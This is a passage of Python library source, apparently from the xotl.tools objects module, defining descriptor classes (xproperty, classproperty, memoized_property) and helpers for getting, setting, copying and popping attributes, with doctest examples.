check(method, FUNC_TYPES):\n kwargs[\"do_assigning\"] = False\n\n def init():\n from sys import _getframe\n\n obj = _getframe(1).f_locals[\"obj\"]\n if kind == FUNC_KINDS[0]:\n return method(obj)\n elif kind == FUNC_KINDS[1]:\n return method()\n else:\n return method(type(obj))\n\n init.__name__ = method.__name__\n return SafeDataItem(init, **kwargs)\n\n if kwargs:\n return inner\n elif len(args) == 1:\n return inner(args[0])\n else:\n msg = \"expected only one positional argument, got %s\"\n raise TypeError(msg % len(args))\n\n def __get__(self, obj, owner):\n if obj is not None:\n from xotl.tools.future.inspect import get_attr_value\n\n res = get_attr_value(obj, self.inner_name, Unset)\n if res is not Unset:\n return res\n elif self.init is not Unset:\n res = self.init()\n self.__set__(obj, res)\n return res\n elif self.default is not Unset:\n res = self.default\n self.__set__(obj, res)\n return res\n else:\n msg = \"'{}' object has no attribute '{}'\"\n type_name = type(obj).__name__\n raise AttributeError(msg.format(type_name, self.attr_name))\n else:\n return self\n\n def __set__(self, obj, value):\n object.__setattr__(obj, self.inner_name, value)\n\n def __delete__(self, obj):\n object.__delattr__(obj, self.inner_name)\n\n def _get_class_context(self):\n \"Get the class variable context\"\n from sys import _getframe\n\n frame = _getframe(1)\n i, MAX = 0, 5\n res = None\n while not res and (i < MAX):\n aux = frame.f_locals\n if \"__module__\" in aux:\n res = aux\n else:\n frame = frame.f_back\n i += 1\n if res:\n return res\n else:\n msg = \"Invalid `SafeDataItem(%s)` call, must be used in a class \" \"context.\"\n raise TypeError(msg % self.attr_name)\n\n def _unique_name(self):\n \"\"\"Generate a unique new name.\"\"\"\n from time import time\n from xotl.tools.bases import int2str\n\n return \"_%s\" % int2str(int(1000000 * time()))\n\n def __parse_arguments(self, *args, **kwargs):\n \"\"\"Assign parsed arguments to the just created instance.\"\"\"\n from xotl.tools.validators import is_valid_identifier, predicate\n\n self.attr_name = Unset\n self.init = Unset\n self.default = Unset\n self.do_assigning = True\n self.validator = True\n for i, arg in enumerate(args):\n if self.attr_name is Unset and is_valid_identifier(arg):\n self.attr_name = arg\n elif self.init is Unset and callable(arg):\n self.init = arg\n else:\n msg = (\n \"Invalid positional arguments: %s at %s\\n\"\n \"Valid arguments are the attribute name and a \"\n \"callable constructor for initial value.\"\n )\n raise ValueError(msg % (args[i:], i))\n bads = {}\n for key in kwargs:\n value = kwargs[key]\n if (\n self.default is Unset\n and self.init is Unset\n and key in (\"default\", \"value\", \"initial_value\")\n ):\n self.default = value\n elif self.validator is True and key in (\"validator\", \"checker\", \"check\"):\n self.validator = value\n elif self.do_assigning is True and key == \"do_assigning\" and value is False:\n self.do_assigning = False\n else:\n bads[key] = value\n self.validator = predicate(self.validator)\n if bads:\n msg = (\n \"Invalid keyword arguments: %s\\n\"\n \"See constructor documentation for more info.\"\n )\n raise ValueError(msg % bads)\n if self.attr_name is Unset:\n from xotl.tools.names import nameof\n\n if self.init is not Unset:\n if isinstance(self.init, type):\n self.attr_name = str(\"_%s\" % self.init.__name__)\n else:\n self.attr_name = nameof(self.init, safe=True)\n else:\n self.attr_name = self._unique_name()\n self.inner_name = str(\"__%s__\" % self.attr_name.strip(\"_\"))\n\n\ndef smart_getter(obj, strict=False):\n \"\"\"Returns a smart getter for `obj`.\n\n If `obj` is a mapping, it returns the ``.get()`` method bound to the\n object `obj`, otherwise it returns a partial of ``getattr`` on `obj`.\n\n :param strict: Set this to True so that the returned getter checks that\n keys/attrs exists. If `strict` is True the getter may\n raise a KeyError or an AttributeError.\n\n .. versionchanged:: 1.5.3 Added the parameter `strict`.\n\n \"\"\"\n from xotl.tools.future.collections import Mapping\n\n if isinstance(obj, Mapping):\n if not strict:\n return obj.get\n else:\n\n def getter(key, default=Unset):\n \"Get the given key. Raise an error when it doesn't exists.\"\n try:\n return obj[key]\n except KeyError:\n if default is Unset:\n raise\n else:\n return default\n\n return getter\n else:\n if not strict:\n\n def getter(attr, default=None):\n \"Get the given attr. Return default if it doesn't exists.\"\n return getattr(obj, attr, default)\n\n return getter\n else:\n\n def getter(attr, default=Unset):\n \"Get the given attr. Raise an error when it doesn't exists.\"\n try:\n return getattr(obj, attr)\n except AttributeError:\n if default is Unset:\n raise\n else:\n return default\n\n return getter\n\n\ndef smart_setter(obj):\n \"\"\"Returns a smart setter for `obj`.\n\n If `obj` is a mutable mapping, it returns the ``.__setitem__()`` method\n bound to the object `obj`, otherwise it returns a partial of ``setattr``\n on `obj`.\n\n .. versionadded:: 1.8.2\n\n \"\"\"\n from xotl.tools.future.functools import partial\n from xotl.tools.future.collections import MutableMapping\n\n if isinstance(obj, MutableMapping):\n return obj.__setitem__\n else:\n return partial(setattr, obj)\n\n\ndef smart_getter_and_deleter(obj):\n \"\"\"Returns a function that get and deletes either a key or an attribute of\n obj depending on the type of `obj`.\n\n If `obj` is a `collections.Mapping` it must be a\n `collections.MutableMapping`.\n\n \"\"\"\n from collections import Mapping, MutableMapping\n from functools import partial\n\n if isinstance(obj, Mapping) and not isinstance(obj, MutableMapping):\n raise TypeError(\"If `obj` is a Mapping it must be a MutableMapping\")\n if isinstance(obj, MutableMapping):\n return lambda key, default=None: obj.pop(key, default)\n else:\n return partial(popattr, obj)\n\n\n# TODO: [med] See the get_traverser. I think the function is actually\n# a subtype of that. Also, this method sticks with the getter for the\n# top object, see the failing companion test in this commit.\ndef multi_getter(source, *ids):\n \"\"\"Get values from `source` of all given `ids`.\n\n :param source: Any object but dealing with differences between mappings\n and other object types.\n\n :param ids: Identifiers to get values from `source`.\n\n An ID item could be:\n\n - a string: is considered a key, if `source` is a mapping, or an\n attribute name if `source` is an instance of any other type.\n\n - a collection of strings: find the first valid value in `source`\n evaluating each item in this collection using the above logic.\n\n Example::\n\n >>> d = {'x': 1, 'y': 2, 'z': 3}\n >>> list(multi_getter(d, 'a', ('y', 'x'), ('x', 'y'), ('a', 'z', 'x')))\n [None, 2, 1, 3]\n\n >>> next(multi_getter(d, ('y', 'x'), ('x', 'y')), '---')\n 2\n\n >>> next(multi_getter(d, 'a', ('b', 'c'), ('e', 'f')), '---') is None\n True\n\n .. versionadded:: 1.7.1\n\n \"\"\"\n getter = smart_getter(source)\n\n def first(a):\n return next((i for i in map(getter, a) if i is not None), None)\n\n def get(a):\n from xotl.tools.values.simple import logic_iterable_coerce as many\n\n return first(a) if many(a) else getter(a)\n\n return (get(aux) for aux in ids)\n\n\ndef mass_setattr(obj, **attrs):\n \"\"\"Set all given attributes and return the same object.\"\"\"\n # See 'xotl.tools.decorator.constant_bagger' ;)\n for attr in attrs:\n setattr(obj, attr, attrs[attr])\n return obj\n\n\ndef is_private_name(name):\n \"\"\"Return if `name` is private or not.\"\"\"\n prefix = \"__\"\n return name.startswith(prefix) and not name.endswith(prefix)\n\n\ndef fix_private_name(cls, name):\n \"\"\"Correct a private name with Python conventions, return the same value if\n name is not private.\n\n \"\"\"\n if is_private_name(name):\n return str(\"_%s%s\" % (cls.__name__, name))\n else:\n return name\n\n\n# TODO: @med, @manu, Decide if it's best to create a\n# 'xotl.tools.future.inspect' that extends the standard library module\n# 'inspect' and place this signature-dealing functions there. Probably, to be\n# consistent, this imposes a refactoring of some of 'xotl.tools.future.types'\n# and move all the \"is_classmethod\", \"is_staticmethod\" and inspection-related\n# functions there.\ndef get_method_function(cls, method_name):\n \"\"\"Get definition function given in its `method_name`.\n\n There is a difference between the result of this function and\n ``getattr(cls, method_name)`` because the last one return the unbound\n method and this a python function.\n\n \"\"\"\n if not isinstance(cls, type):\n cls = cls.__class__\n mro = cls.mro()\n i, res = 0, None\n while not res and (i < len(mro)):\n sc = mro[i]\n method = sc.__dict__.get(method_name)\n if callable(method):\n res = method\n else:\n i += 1\n return res\n\n\ndef build_documentation(cls, get_doc=None, deep=1):\n \"\"\"Build a proper documentation from a class `cls`.\n\n Classes are recursed in MRO until process all levels (`deep`)\n building the resulting documentation.\n\n The function `get_doc` get the documentation of a given class. If\n no function is given, then attribute ``__doc__`` is used.\n\n \"\"\"\n from xotl.tools.future.codecs import safe_decode\n\n assert isinstance(cls, type), _INVALID_CLASS_TYPE_MSG\n if deep < 1:\n deep = 1\n get_doc = get_doc or (lambda c: c.__doc__)\n mro = cls.mro()\n i, level, used, res = 0, 0, {}, \"\"\n while (level < deep) and (i < len(mro)):\n sc = mro[i]\n doc = get_doc(sc)\n if doc:\n doc = safe_decode(doc).strip()\n key = sc.__name__\n docs = used.setdefault(key, set())\n if doc not in docs:\n docs.add(doc)\n if res:\n res += \"\\n\\n\"\n res += \"=== <%s> ===\\n\\n%s\" % (key, doc)\n level += 1\n i += 1\n return res\n\n\ndef fix_class_documentation(cls, ignore=None, min_length=10, deep=1, default=None):\n \"\"\"Fix the documentation for the given class using its super-classes.\n\n This function may be useful for shells or Python Command Line Interfaces\n (CLI).\n\n If `cls` has an invalid documentation, super-classes are recursed\n in MRO until a documentation definition was made at any level.\n\n :param ignore: could be used to specify which classes to ignore by\n specifying its name in this list.\n\n :param min_length: specify that documentations with less that a number of\n characters, also are ignored.\n\n \"\"\"\n assert isinstance(cls, type), _INVALID_CLASS_TYPE_MSG\n if _len(cls.__doc__) < min_length:\n ignore = ignore or ()\n\n def get_doc(c):\n if (c.__name__ not in ignore) and _len(c.__doc__) >= min_length:\n return c.__doc__\n else:\n return None\n\n doc = build_documentation(cls, get_doc, deep)\n if doc:\n cls.__doc__ = doc\n elif default:\n cls.__doc__ = default(cls) if callable(default) else default\n\n\ndef fix_method_documentation(\n cls, method_name, ignore=None, min_length=10, deep=1, default=None\n):\n \"\"\"Fix the documentation for the given class using its super-classes.\n\n This function may be useful for shells or Python Command Line Interfaces\n (CLI).\n\n If `cls` has an invalid documentation, super-classes are recursed in MRO\n until a documentation definition was made at any level.\n\n :param ignore: could be used to specify which classes to ignore by\n specifying its name in this list.\n\n :param min_length: specify that documentations with less that a number of\n characters, also are ignored.\n\n \"\"\"\n assert isinstance(cls, type), _INVALID_CLASS_TYPE_MSG\n method = get_method_function(cls, method_name)\n if method and _len(method.__doc__) < min_length:\n ignore = ignore or ()\n\n def get_doc(c):\n if c.__name__ not in ignore:\n method = c.__dict__.get(method_name)\n if callable(method) and _len(method.__doc__) >= min_length:\n return method.__doc__\n else:\n return None\n else:\n return None\n\n doc = build_documentation(cls, get_doc, deep)\n if doc:\n method.__doc__ = doc\n elif default:\n method.__doc__ = default(cls) if callable(default) else default\n\n\ndef fulldir(obj):\n \"\"\"Return a set with all attribute names defined in `obj`\"\"\"\n from xotl.tools.future.inspect import get_attr_value, _static_getmro\n\n def getdir(o):\n return set(get_attr_value(o, \"__dict__\", {}))\n\n if isinstance(obj, type):\n res = set.union(getdir(cls) for cls in _static_getmro(obj))\n else:\n res = getdir(obj)\n return res if isinstance(obj, type) else res | set(dir(type(obj)))\n\n\ndef xdir(obj, getter=None, filter=None, _depth=0):\n \"\"\"Return all ``(attr, value)`` pairs from `obj` make ``filter(attr, value)``\n True.\n\n :param obj: The object to be instrospected.\n\n :param filter: A filter that will be passed both the attribute\n name and it's value as two positional arguments. It should return True\n for attrs that should be yielded.\n\n If None, all pairs will match.\n\n :param getter: A function with the same signature that\n ``getattr`` to be used to get the values from `obj`. If\n None, use `getattr`:func:.\n\n .. versionchanged:: 1.8.1 Removed deprecated `attr_filter` and\n `value_filter` arguments.\n\n \"\"\"\n getter = getter or getattr\n attrs = dir(obj)\n res = ((a, getter(obj, a)) for a in attrs)\n if filter:\n res = ((a, v) for a, v in res if filter(a, v))\n return res\n\n\ndef fdir(obj, getter=None, filter=None):\n \"\"\"Similar to `xdir`:func: but yields only the attributes names.\"\"\"\n full = xdir(obj, getter=getter, filter=filter, _depth=1)\n return (attr for attr, _v in full)\n\n\ndef validate_attrs(source, target, force_equals=(), force_differents=()):\n \"\"\"Makes a 'comparison' of `source` and `target` by its attributes (or\n keys).\n\n This function returns True if and only if both of these tests\n pass:\n\n - All attributes in `force_equals` are equal in `source` and `target`\n\n - All attributes in `force_differents` are different in `source` and\n `target`\n\n For instance::\n\n >>> class Person:\n ... def __init__(self, **kwargs):\n ... for which in kwargs:\n ... setattr(self, which, kwargs[which])\n\n >>> source = Person(name='Manuel', age=33, sex='male')\n >>> target = {'name': 'Manuel', 'age': 4, 'sex': 'male'}\n\n >>> validate_attrs(source, target, force_equals=('sex',),\n ... force_differents=('age',))\n True\n\n >>> validate_attrs(source, target, force_equals=('age',))\n False\n\n If both `force_equals` and `force_differents` are empty it will\n return True::\n\n >>> validate_attrs(source, target)\n True\n\n \"\"\"\n from operator import eq, ne\n\n res = True\n tests = ((eq, force_equals), (ne, force_differents))\n j = 0\n get_from_source = smart_getter(source)\n get_from_target = smart_getter(target)\n while res and (j < len(tests)):\n passed, attrs = tests[j]\n i = 0\n while res and (i < len(attrs)):\n attr = attrs[i]\n if passed(get_from_source(attr), get_from_target(attr)):\n i += 1\n else:\n res = False\n j += 1\n return res\n\n\n# Mark this so that informed people may use it.\nvalidate_attrs._positive_testing = True\n\n\ndef iterate_over(source, *keys):\n \"\"\"Yields pairs of (key, value) for of all `keys` in `source`.\n\n If any `key` is missing from `source` is ignored (not yielded).\n\n If `source` is a `collection\n <xotl.tools.values.simple.logic_collection_coerce>`:func:, iterate over\n each of the items searching for any of keys. This is not recursive.\n\n If no `keys` are provided, return an \"empty\" iterator -- i.e will raise\n StopIteration upon calling `next`.\n\n .. versionadded:: 1.5.2\n\n \"\"\"\n from xotl.tools.values.simple import logic_collection_coerce, nil\n\n def inner(source):\n get = smart_getter(source)\n for key in keys:\n val = get(key, Unset)\n if val is not Unset:\n yield key, val\n\n def when_collection(source):\n for generator in map(inner, source):\n for key, val in generator:\n yield key, val\n\n if logic_collection_coerce(source) is not nil:\n res = when_collection(source)\n else:\n res = inner(source)\n return res\n\n\ndef get_first_of(source, *keys, default=None, pred=None):\n \"\"\"Return the value of the first occurrence of any of the specified `keys`\n in `source` that matches `pred` (if given).\n\n Both `source` and `keys` has the same meaning as in `iterate_over`:func:.\n\n :param default: A value to be returned if no key is found in `source`.\n\n :param pred: A function that should receive a single value and return\n False if the value is not acceptable, and thus\n `get_first_of` should look for another.\n\n .. versionchanged:: 1.5.2 Added the `pred` option.\n\n \"\"\"\n _key, res = next(\n ((k, val) for k, val in iterate_over(source, *keys) if not pred or pred(val)),\n (Unset, Unset),\n )\n return res if res is not Unset else default\n\n\ndef pop_first_of(source, *keys, **kwargs):\n \"\"\"Similar to `get_first_of`:func: using as `source` either an object or a\n mapping and deleting the first attribute or key.\n\n Examples::\n\n >>> somedict = dict(bar='bar-dict', eggs='eggs-dict')\n\n >>> class Foo: pass\n >>> foo = Foo()\n >>> foo.bar = 'bar-obj'\n >>> foo.eggs = 'eggs-obj'\n\n >>> pop_first_of((somedict, foo), 'eggs')\n 'eggs-dict'\n\n >>> pop_first_of((somedict, foo), 'eggs')\n 'eggs-obj'\n\n >>> pop_first_of((somedict, foo), 'eggs') is None\n True\n\n >>> pop_first_of((foo, somedict), 'bar')\n 'bar-obj'\n\n >>> pop_first_of((foo, somedict), 'bar')\n 'bar-dict'\n\n >>> pop_first_of((foo, somedict), 'bar') is None\n True\n\n \"\"\"\n from xotl.tools.values.simple import logic_collection_coerce, nil\n\n def inner(source):\n get = smart_getter_and_deleter(source)\n res, i = Unset, 0\n while (res is Unset) and (i < len(keys)):\n res = get(keys[i], Unset)\n i += 1\n return res\n\n if logic_collection_coerce(source) is not nil:\n res = Unset\n source = iter(source)\n probe = next(source, None)\n while res is Unset and probe:\n res = inner(probe)\n probe = next(source, None)\n else:\n res = inner(source)\n return res if res is not Unset else kwargs.get(\"default\", None)\n\n\ndef popattr(obj, name, default=None):\n \"\"\"Looks for an attribute in the `obj` and returns its value and removes\n the attribute. If the attribute is not found, `default` is returned\n instead.\n\n Examples::\n\n >>> class Foo:\n ... a = 1\n >>> foo = Foo()\n >>> foo.a = 2\n >>> popattr(foo, 'a')\n 2\n >>> popattr(foo, 'a')\n 1\n >>> popattr(foo, 'a') is None\n True\n\n \"\"\"\n res = getattr(obj, name, Unset)\n if res is Unset:\n res = default\n else:\n try:\n delattr(obj, name)\n except AttributeError:\n try:\n delattr(obj.__class__, name)\n except AttributeError:\n pass\n return res\n\n\nclass lazy:\n \"\"\"Marks a value as a lazily evaluated value. See `setdefaultattr`:func:.\n\n \"\"\"\n\n def __init__(self, value, *args, **kwargs):\n self.value = value\n self.args = args\n self.kwargs = kwargs\n\n def __call__(self):\n res = self.value\n if callable(res):\n return res(*self.args, **self.kwargs)\n else:\n return res\n\n\ndef iter_branch_subclasses(cls, include_this=True):\n \"\"\"Internal function, see `get_branch_subclasses`:func:.\"\"\"\n children = type.__subclasses__(cls)\n if children:\n for sc in children:\n yield from iter_branch_subclasses(sc)\n elif include_this:\n yield cls\n\n\ndef get_branch_subclasses(cls, *, include_this=False):\n \"\"\"Similar to `type.__subclasses__`:meth: but recursive.\n\n Only return sub-classes in branches (those with no sub-classes). Instead\n of returning a list, yield each valid value.\n\n .. versionadded:: 1.7.0\n\n .. versionchanged:: 2.1.5 Add keyword-only argument `include_this`.\n\n \"\"\"\n return list(iter_branch_subclasses(cls, include_this=include_this))\n\n\n@deprecated(iter_branch_subclasses)\ndef iter_final_subclasses(cls, *, include_this=True):\n \"\"\"Iterate over the final sub-classes of `cls`.\n\n Final classes are those which has no sub-classes. If `cls` is final, the\n iterator yields only `cls` unless `include_this` is False.\n\n .. versionadded:: 2.1.0\n\n .. deprecated:: 2.1.5 This is actually a duplicate of\n `iter_branch_subclasses`:func:.\n\n \"\"\"\n return iter_branch_subclasses(cls, include_this=include_this)\n\n\n@deprecated(get_branch_subclasses)\ndef get_final_subclasses(cls, *, include_this=True):\n \"\"\"List final sub-classes of `cls`.\n\n See `iter_final_subclasses`:func:.\n\n .. versionadded:: 2.1.0\n\n .. deprecated:: 2.1.5 This is a duplicate of\n `get_branch_subclasses`:func:.\n\n \"\"\"\n return list(iter_final_subclasses(cls, include_this=include_this))\n\n\ndef FinalSubclassEnumeration(superclass, *, dynamic=True):\n \"\"\"A final sub-class enumeration.\n\n Return a enumeration-like class (i.e has ``__members__`` and each\n attribute) that enumerates the **final** subclasses of a given superclass\n (not including `superclass`).\n\n If `dynamic` is True, don't cache the subclasses; i.e if a new subclass is\n created after the enumeration, the __members__ dictionary will change.\n\n The resulting enumeration class has a method ``invalidate_cache()`` which\n allows non-dynamic classes to update its underlying cache.\n\n .. versionadded:: 2.1.0\n\n \"\"\"\n\n class enumtype(type):\n @property\n def __members__(self):\n if self._cached_members is None or self._dynamic:\n result = {\n c.__name__: c\n for c in iter_branch_subclasses(superclass, include_this=False)\n }\n if not self._dynamic:\n self._cached_members = dict(result)\n else:\n result = dict(self._cached_members)\n return result\n\n def __getattr__(self, attr):\n result = self.__members__.get(attr, None)\n if result is None:\n raise AttributeError(attr)\n else:\n return result\n\n def __dir__(self):\n return list(self.__members__.keys()) + [\"__members__\"]\n\n def invalidate_cache(self):\n self._cached_members = None\n\n class enumeration(metaclass=enumtype):\n _dynamic = dynamic\n _cached_members = None\n\n return enumeration\n\n\n# TODO: Check `xotl.tools.future.types.DynamicClassAttribute`:class: for more\n# information and to compare with this one.\nclass xproperty(property):\n \"\"\"Descriptor that gets values the same for instances and for classes.\n\n Example of its use::\n\n >>> class Foobar:\n ... _x = 'in the class'\n ...\n ... def __init__(self):\n ... self._x = 'in the instance'\n ...\n ... @xproperty\n ... def x(self):\n ... return self._x\n\n >>> f = Foobar()\n\n >>> Foobar.x\n 'in the class'\n\n >>> f.x\n 'in the instance'\n\n X-properties are always read-only, if attribute values must be set or\n deleted, a metaclass must be defined.\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n\n def __init__(self, fget, doc=None):\n if fget is not None:\n super().__init__(fget, doc=doc)\n else:\n raise TypeError('xproperty() the \"fget\" argument is requiered')\n\n def __get__(self, instance, owner):\n return self.fget(instance if instance is not None else owner)\n\n\nclass classproperty(property):\n \"\"\"A descriptor that behaves like property for instances but for classes.\n\n Example of its use::\n\n class Foobar:\n @classproperty\n def getx(cls):\n return cls._x\n\n A writable `classproperty` is difficult to define, and it's not intended\n for that case because 'setter', and 'deleter' decorators can't be used for\n obvious reasons. For example::\n\n class Foobar:\n x = 1\n def __init__(self, x=2):\n self.x = x\n def _get_name(cls):\n return str(cls.x)\n def _set_name(cls, x):\n cls.x = int(x)\n name = classproperty(_get_name, _set_name)\n\n .. versionadded:: 1.4.1\n\n .. versionchanged:: 1.8.0 Inherits from `property`\n\n \"\"\"\n\n def __get__(self, instance, owner):\n obj = type(instance) if instance is not None else owner\n return super().__get__(obj, owner)\n\n def __set__(self, instance, value):\n obj = instance if isinstance(instance, type) else type(instance)\n super().__set__(obj, value)\n\n def __delete__(self, instance):\n obj = instance if isinstance(instance, type) else type(instance)\n super().__delete__(obj)\n\n\nclass staticproperty(property):\n \"\"\"A descriptor that behaves like properties for instances but static.\n\n Example of its use::\n\n class Foobar:\n @staticproperty\n def getx():\n return 'this is static'\n\n A writable `staticproperty` is difficult to define, and it's not intended\n for that case because 'setter', and 'deleter' decorators can't be used for\n obvious reasons. For example::\n\n class Foobar:\n x = 1\n def __init__(self, x=2):\n self.x = x\n def _get_name():\n return str(Foobar.x)\n def _set_name(x):\n Foobar.x = int(x)\n name = staticproperty(_get_name, _set_name)\n\n .. versionadded:: 1.8\n\n \"\"\"\n\n def __get__(self, instance, owner):\n if self.fget is not None:\n return self.fget()\n else:\n raise AttributeError(\"unreadable attribute\")\n\n def __set__(self, instance, value):\n if self.fset is not None:\n self.fset(value)\n else:\n raise AttributeError(\"can't set attribute\")\n\n def __delete__(self, instance):\n if self.fdel is not None:\n self.fdel()\n else:\n raise AttributeError(\"can't delete attribute\")\n\n\n# The following is extracted from the SQLAlchemy project's codebase, merit and\n# copyright goes to SQLAlchemy authors.\n#\n# Copyright (C) 2005-2011 the SQLAlchemy authors and contributors\n#\n# This module is part of SQLAlchemy and is released under the MIT License:\n# http://www.opensource.org/licenses/mit-license.php\n#\nclass memoized_property:\n \"\"\"A read-only property that is only evaluated once.\n\n This is extracted from the SQLAlchemy project's codebase, merit and\n copyright goes to SQLAlchemy authors::\n\n Copyright (C) 2005-2011 the SQLAlchemy authors and contributors\n\n This module is part of SQLAlchemy and is released under the MIT License:\n http://www.opensource.org/licenses/mit-license.php\n\n \"\"\"\n\n def __init__(self, fget, doc=None):\n self.fget = fget\n self.__doc__ = doc or fget.__doc__\n self.__name__ = fget.__name__\n\n def __get__(self, obj, cls):\n if obj is None:\n return self\n obj.__dict__[self.__name__] = result = self.fget(obj)\n return result\n\n def reset(self, instance):\n \"\"\"Clear the cached value of `instance`.\"\"\"\n instance.__dict__.pop(self.__name__, None)\n\n\ndef setdefaultattr(obj, name, value):\n \"\"\"Sets the attribute name to value if it is not set::\n\n >>> class Someclass: pass\n >>> inst = Someclass()\n >>> setdefaultattr(inst, 'foo', 'bar')\n 'bar'\n\n >>> inst.foo\n 'bar'\n\n >>> inst.spam = 'egg'\n >>> setdefaultattr(inst, 'spam', 'with ham')\n 'egg'\n\n (`New in version 1.2.1`). If you want the value to be lazily evaluated you\n may provide a lazy-lambda::\n\n >>> inst = Someclass()\n >>> inst.a = 1\n >>> def setting_a():\n ... print('Evaluating!')\n ... return 'a'\n\n >>> setdefaultattr(inst, 'a', lazy(setting_a))\n 1\n\n >>> setdefaultattr(inst, 'ab', lazy(setting_a))\n Evaluating!\n 'a'\n\n \"\"\"\n res = getattr(obj, name, Unset)\n if res is Unset:\n if isinstance(value, lazy):\n value = value()\n setattr(obj, name, value)\n res = value\n return res\n\n\ndef adapt_exception(value, **kwargs):\n \"\"\"Like PEP-246, Object Adaptation, with ``adapt(value, Exception,\n None)``.\n\n If the value is not an exception is expected to be a tuple/list which\n contains an Exception type as its first item.\n\n .. versionchanged:: 1.8.0 Moved from `xotl.tools.data`:mod: module.\n\n \"\"\"\n isi, ebc = isinstance, Exception # TODO: Maybe must be `BaseException`\n issc = lambda maybe, cls: isi(maybe, type) and issubclass(maybe, cls)\n if isi(value, ebc) or issc(value, ebc):\n return value\n elif isi(value, (tuple, list)) and len(value) > 0 and issc(value[0], ebc):\n map = lambda x: x.format(**kwargs) if isinstance(x, str) else x\n ecls = value[0]\n return ecls(*(map(x) for x in value[1:]))\n else:\n return None\n\n\ndef copy_class(cls, meta=None, ignores=None, new_attrs=None, new_name=None):\n \"\"\"Copies a class definition to a new class.\n\n The returned class will have the same name, bases and module of `cls`.\n\n :param meta: If None, the `type(cls)` of the class is used to build the\n new class, otherwise this must be a *proper* metaclass.\n\n :param ignores: A sequence of attributes names that should not be copied\n to the new class.\n\n An item may be callable accepting a single argument `attr` that must\n return a non-null value if the the `attr` should be ignored.\n\n :param new_attrs: New attributes the class must have. These will take\n precedence over the attributes in the original class.\n\n :type new_attrs: dict\n\n :param new_name: The name for the copy. If not provided the name will\n copied.\n\n .. versionadded:: 1.4.0\n\n .. versionchanged:: 1.7.1 The `ignores` argument must an iterable of\n strings or callables. Removed the glob-pattern and regular expressions\n as possible values. They are all possible via the callable variant.\n\n .. versionadded:: 1.7.1 The `new_name` argument.\n\n \"\"\"\n from types import new_class\n from xotl.tools.future.types import MemberDescriptorType\n\n def _get_ignored(what):\n if callable(what):\n return what\n else:\n return lambda s: s == what\n\n if not meta:\n meta = type(cls)\n if ignores:\n ignores = tuple(_get_ignored(i) for i in ignores)\n ignored = lambda name: any(ignore(name) for ignore in ignores)\n else:\n ignored = None\n valid_names = (\"__class__\", \"__mro__\", \"__name__\", \"__weakref__\", \"__dict__\")\n attrs = {\n name: value\n for name, value in cls.__dict__.items()\n if name not in valid_names\n # Must remove member descriptors, otherwise the old's class\n # descriptor will override those that must be created here.\n if not isinstance(value, MemberDescriptorType)\n if ignored is None or not ignored(name)\n }\n if new_attrs:\n attrs.update(new_attrs)\n\n def exec_body(ns): # noqa: E306 new-line before def\n ns.update(attrs)\n\n name = new_name if new_name else cls.__name__\n result = new_class(name, cls.__bases__, {\"metaclass\": meta}, exec_body)\n return result\n\n\n# Real signature is (*sources, target, *, default=None) where target is a\n# positional argument, and not a keyword.\n# TODO: First look up \"target\" in keywords and then in positional arguments.\ndef smart_copy(*args, defaults=None):\n \"\"\"Copies the first apparition of attributes (or keys) from `sources` to\n `target`.\n\n :param sources: The objects from which to extract keys or attributes.\n\n :param target: The object to fill.\n\n :param defaults: Default values for the attributes to be copied as\n explained below. Defaults to False.\n\n :type defaults: Either a bool, a dictionary, an iterable or a callable.\n\n Every `sources` and `target` are always positional arguments. There should\n be at least one source. `target` will always be the last positional\n argument.\n\n If `defaults` is a dictionary or an iterable then only the names provided\n by itering over `defaults` will be copied. If `defaults` is a dictionary,\n and one of its key is not found in any of the `sources`, then the value of\n the key in the dictionary is copied to `target` unless:\n\n - It's the value `~xotl.tools.symbols.Undefined`:obj:.\n\n - An exception object\n\n - A sequence with is first value being a subclass of Exception. In which\n case `adapt_exception`:class: is used.\n\n In these cases a KeyError is raised if the key is not found in the\n sources.\n\n If `defaults` is an iterable and a key is not found in any of the sources,\n None is copied to `target`.\n\n If `defaults` is a callable then it should receive one positional\n arguments for the current `attribute name` and several keyword arguments\n (we pass ``source``) and return either True or False if the attribute\n should be copied.\n\n If `defaults` is False (or None) only the attributes that do not start\n with a \"_\" are copied, if it's True all attributes are copied.\n\n When `target` is not a mapping only valid Python identifiers will be\n copied.\n\n Each `source` is considered a mapping if it's an instance of\n `collections.Mapping` or a `MappingProxyType`.\n\n The `target` is considered a mapping if it's an instance of\n `collections.MutableMapping`.\n\n :returns: `target`.\n\n .. versionchanged:: 1.7.0 `defaults` is now keyword only.\n\n \"\"\"\n from xotl.tools.future.collections import MutableMapping, Mapping\n from xotl.tools.symbols import Undefined\n from xotl.tools.validators.identifiers import is_valid_identifier\n from xotl.tools.values.simple import logic_iterable_coerce, nil\n\n *sources, target = args\n if not sources:\n raise TypeError(\"smart_copy() requires at least one source\")\n if isinstance(target, (bool, type(None), int, float, str)):\n raise TypeError(\n \"target should be a mutable object, not \" \"{}\".format(type(target).__name__)\n )\n if isinstance(target, MutableMapping):\n\n def setter(key, val):\n target[key] = val\n\n else:\n\n def setter(key, val):\n if is_valid_identifier(key):\n setattr(target, key, val)\n\n _mapping = isinstance(defaults, Mapping)\n if _mapping or logic_iterable_coerce(defaults) is not nil:\n for key, val in (\n (key, get_first_of(sources, key, default=Unset)) for key in defaults\n ):\n if val is Unset:\n if _mapping:\n val = defaults.get(key, None)\n else:\n val = None\n exc = adapt_exception(val, key=key)\n if exc or val is Undefined:\n raise KeyError(key)\n setter(key, val)\n else:\n keys = []\n for source in sources:\n get = smart_getter(source)\n items = source if isinstance(source, Mapping) else dir(source)\n for key in items:\n private = isinstance(key, str) and key.startswith(\"_\")\n if (defaults is False or defaults is None) and private:\n copy = False\n elif callable(defaults):\n copy = defaults(key, source=source)\n else:\n copy = True\n if key not in keys:\n keys.append(key)\n if copy:\n setter(key, get(key))\n return target\n\n\ndef extract_attrs(obj, *names, **kwargs):\n \"\"\"Extracts all `names` from an object.\n\n If `obj` is a Mapping, the names will be search in the keys of the `obj`;\n otherwise the names are considered regular attribute names.\n\n If `default` is Unset and any name is not found, an AttributeError is\n raised, otherwise the `default` is used instead.\n\n Returns a tuple if there are more that one name, otherwise returns a\n single value.\n\n .. versionadded:: 1.4.0\n\n .. versionchanged:: 1.5.3 Each `name` may be a path like in\n `get_traverser`:func:, but only \".\" is allowed as separator.\n\n \"\"\"\n default = kwargs.pop(\"default\", Unset)\n if kwargs:\n raise TypeError(\"Invalid keyword arguments for `extract_attrs`\")\n getter = get_traverser(*names, default=default)\n return getter(obj)\n\n\ndef traverse(obj, path, default=Unset, sep=\".\", getter=None):\n \"\"\"Traverses an object's hierarchy by performing an attribute get at each\n 